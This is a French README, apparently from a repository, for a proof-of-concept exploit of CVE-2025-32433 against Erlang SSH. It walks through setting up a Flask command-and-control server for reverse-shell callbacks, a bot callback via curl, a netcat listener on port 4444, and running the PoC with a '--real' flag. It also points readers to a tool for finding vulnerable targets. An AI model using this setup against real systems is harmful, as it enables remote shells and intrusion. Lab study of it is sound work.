
Preuve de concept d'exploit pour CVE-2025-32433 avec des modes d'attaque simulé et réel, incluant un serveur C2 basé sur Flask pour les rappels de shell inverse et la simulation de post-exploitation.
Ce dépôt contient du code qui démontre une véritable CVE (CVE-2025-32433).
Utilisez-le uniquement dans des environnements où vous avez une autorisation explicite.
Ne testez jamais cette exploitation contre des systèmes que vous ne possédez ou ne gérez pas.
Une utilisation non autorisée est illégale, contraire à l'éthique et nuisible à la communauté de la cybersécurité.
POC simulé et réel pour CVE-2025-32433
Mon pote Chocapikk m'a montré ce POC trouvé erling_cve.py, j'étais intrigué et je voulais le tester dans un environnement sûr.
Vous avez deux choix avec ce dépôt : le script simulé sûr et le système que je présente ci-dessous.
ou vous pouvez utiliser le vrai erling_cve.py (de manière éthique, avec prudence et uniquement sur des réseaux pour lesquels vous avez l'autorisation de tester).
Avant d'utiliser cet outil pour tester ou exécuter une véritable exploitation, consultez mon pote m0usemm0use et son script Python pour trouver des cibles vulnérables à CVE-2025-32433 !!!!
https://github.com/m0usem0use/erl_mouse
Version SIMULÉE de l'exploit pour CVE-2025-32433
Configurer le serveur C2
Construisez un C2 basé sur Python Flask : puissant pour les rappels de bots ou les shells inversés.
Exécutez ce script d'installation sur le serveur C2
apt update && apt install python3-pip git -y
sudo apt install python3-flask
mkdir ~/c2
cd ~/c2
nano c2_server.py (collez le script c2_server, modifiez si nécessaire)
Exécutez
python3 c2_server.py
Les bots (ou scripts de test) peuvent faire un curl vers la maison comme ceci
curl -X POST http://:8080/report -d "Bot is online"
Configurer l'environnement virtuel Python sur Kali
mkdir ~/ssh-bot-lab && cd ~/ssh-bot-lab
Créez un environnement virtuel Python
python3 -m venv venv
source venv/bin/activate
sudo apt install python3-requests
Tester le rappel
nano test_callback.py (collez le script test_callback, modifiez si nécessaire)
Exécutez le rappel
python3 test_callback.py
Vous avez désormais officiellement
Un environnement virtuel fonctionnel
Un C2 cloud en direct
Une injection de rappel fonctionnelle
-Vous avez besoin que la machine cible/victime ait un processus ou service Erlang exposé (ou simulé)
QUE FAIT erling_cve.py ?
Se connecte au port 22 d'une IP cible
Envoie une fausse chaîne de version SSH
Envoie un paquet conçu (susceptible de déclencher une vulnérabilité — faisant semblant d'abuser de quelque chose comme le gestionnaire SSH non documenté d'Erlang ou un débordement de tampon)
Déclenche un shell inversé vers l'IP de l'attaquant
Simule la post-exploitation en exécutant des commandes comme whoami, uname, et une fausse "exfiltration de credentials" vers /tmp/exfil.log
Nous allons prendre notre PoC trouvé de type Erlang et
Le rendre fonctionnel dans l'environnement virtuel Kali
Le connecter pour signaler à notre C2 cloud lorsque l'"attaque" s'exécute
L'exécuter de manière éthique et sécurisée dans un laboratoire contrôlé
Regardez-le générer /tmp/exfil.log pour simuler des données volées
Depuis la machine Kali
nano poc_erlang_test.py
-collez dans poc_erlang_test.py et modifiez si nécessaire
Ouvrir un écouteur
dans un nouveau terminal, exécutez
nc -lvnp 4444
Exécutez le PoC
python poc_erlang_test.py --real